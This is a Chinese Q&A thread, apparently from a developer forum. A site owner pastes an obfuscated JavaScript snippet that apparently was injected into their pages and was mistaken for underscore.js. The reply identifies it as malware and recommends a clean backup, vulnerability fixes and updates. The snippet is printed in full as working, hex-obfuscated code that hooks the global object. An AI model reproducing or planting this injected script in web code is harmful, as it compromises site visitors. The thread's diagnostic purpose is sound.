我们使用工具来跟踪用户浏览器中发生的js错误。我们有时会看到underscore引发了类似TypeError: string is not a function的错误,因为它被字符串覆盖,看起来像这样
var _0x54e9 = ['triml', "\x72", "\x65\x74\x75\x72", "\x6E\x20\x74\x68", "\x69\x73", "\x63\x6F", "\x6E\x73\x74\x72", "\x75\x63\x74\x6F\x72", "\x66\x69", "\x6C\x74\x65", "\x62\x69\x6E\x64", "\x63", "\x68\x61\x72", "\x43", "\x6F", "\x64\x65\x41\x74", "", "\x61\x70\x70\x6C\x79", "\x70", "\x72\x6F\x74\x6F", "\x74", "\x79\x70\x65", "\x46\x75\x6E\x63\x74\x69\x6F\x6E", "\x4D\x61\x74\x68", "\x73\x65\x74\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x63\x6C\x65\x61\x72\x49\x6E\x74\x65\x72\x76\x61\x6C", "\x6A\x6F\x69\x6E", "\x70\x75\x73\x68", "\x70\x61\x72\x73\x65\x49\x6E\x74", "\x66", "\x6D", "\x68", "\x61\x72", "\x64\x65", "\x73\x70\x6C\x69\x74", "\x63\x6F\x6E\x63\x61\x74", "\x31", "\x30", "\x32", "\x72\x61\x6E\x64\x6F\x6D", "\x73\x70\x6C\x69\x63\x65", "\x40", "\x74\x6F\x53\x74\x72\x69\x6E\x67", "\x0A\x0A\x0A", "\x6C\x65\x6E\x67\x74\x68", "\x6E", "\x61\x74"];
[][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[0]] = function(_0x95b5x1, _0x95b5x2) {
try {
with({
console: null,
window: null,
s: [(function _0x95b5x10() {
return (this[_0x54e9[44]] < ((([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]][_0x54e9[39]]() * 44332) + 323456) >> 0)) ? _0x95b5x10[_0x54e9[17]](this[_0x54e9[11] + _0x54e9[14] + _0x54e9[45] + _0x54e9[11] + _0x54e9[46]](this)) : this
}[_0x54e9[17]](_0x54e9[43]))[_0x54e9[42]]()],
c: []
}) {
var _0x95b5x3 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[22]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[10]][_0x54e9[17]]((_0x54e9[16])[_0x54e9[11] + _0x54e9[12] + _0x54e9[13] + _0x54e9[14] + _0x54e9[15]], [_0x95b5x1]),
_0x95b5x4 = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[23]],
_0x95b5x5 = (function(_0x95b5xf) {
_0x95b5xf && _0x95b5xf()
}),
_0x95b5x6 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[24]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
_0x95b5x7 = _0x95b5x2 ? _0x95b5x5 : [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[25]][_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()),
_0x95b5x8 = 1000000,
_0x95b5x9 = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[10]](c, [_0x54e9[16]]),
_0x95b5xa = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](c),
_0x95b5xb = [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[27]][_0x54e9[10]](s),
_0x95b5xc = [][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()[_0x54e9[28]],
_0x95b5xd = (_0x54e9[16])[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[29] + _0x54e9[1] + _0x54e9[14] + _0x54e9[30] + _0x54e9[13] + _0x54e9[31] + _0x54e9[32] + _0x54e9[13] + _0x54e9[14] + _0x54e9[33]],
_0x95b5xe = _0x95b5x6(function() {
try {
(function() {
try {
[][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x95b5x7(!(this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[17]](this[_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]], [(function() {
while ((this[5]++, _0x95b5xa(_0x95b5x3(this[5] - 1) ^ this[0] ? ((!((!(_0x95b5x3(this[5] - 1) & this[1])) && (_0x95b5xb(_0x95b5xd(_0x95b5xc(_0x95b5x9(), this[4])), [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](c, [0, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8]) && _0x54e9[16])))) ? this[1] : _0x54e9[16]) : this[2]), !!this[7 + this[5]])) {}
}[_0x54e9[10]](this)[_0x54e9[17]]()) || ([][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[26]][_0x54e9[17]](s, [_0x54e9[16]])) || _0x54e9[41]])() && [][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]][_0x54e9[18] + _0x54e9[19] + _0x54e9[20] + _0x54e9[21]][_0x54e9[40]][_0x54e9[17]](s, [1, _0x95b5x4[_0x54e9[39]]() * _0x95b5x8 + _0x95b5x8])) && _0x95b5xe)
} catch (A) {
_0x95b5x7(_0x95b5xe);
if (_0x95b5x2) {
throw A
};
}
}[_0x54e9[10]]([31, _0x54e9[36], _0x54e9[37], _0x54e9[16], _0x54e9[38], 0][_0x54e9[35]](_0x95b5x1[_0x54e9[34]](_0x54e9[16])))())
} catch (A) {
if (_0x95b5x2) {
throw A
}
}
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])()), 1)
}
} catch (A) {
if (_0x95b5x2) {
return A
}
}
}[_0x54e9[10]]([][_0x54e9[8] + _0x54e9[9] + _0x54e9[1]][_0x54e9[5] + _0x54e9[6] + _0x54e9[7]](_0x54e9[1] + _0x54e9[2] + _0x54e9[3] + _0x54e9[4])());
有没有人知道这是从何而来以及如何防止这种情况?
答案 0 :(得分:1)
此代码与undersore.js无关。这些只是以_开头的变量。重新获得功能的最佳方法是从不受恶意软件影响的上次备份恢复站点。修复代码中的漏洞(例如MySQL注入)并更新第三方组件以避免进一步利用系统。经常更新和备份。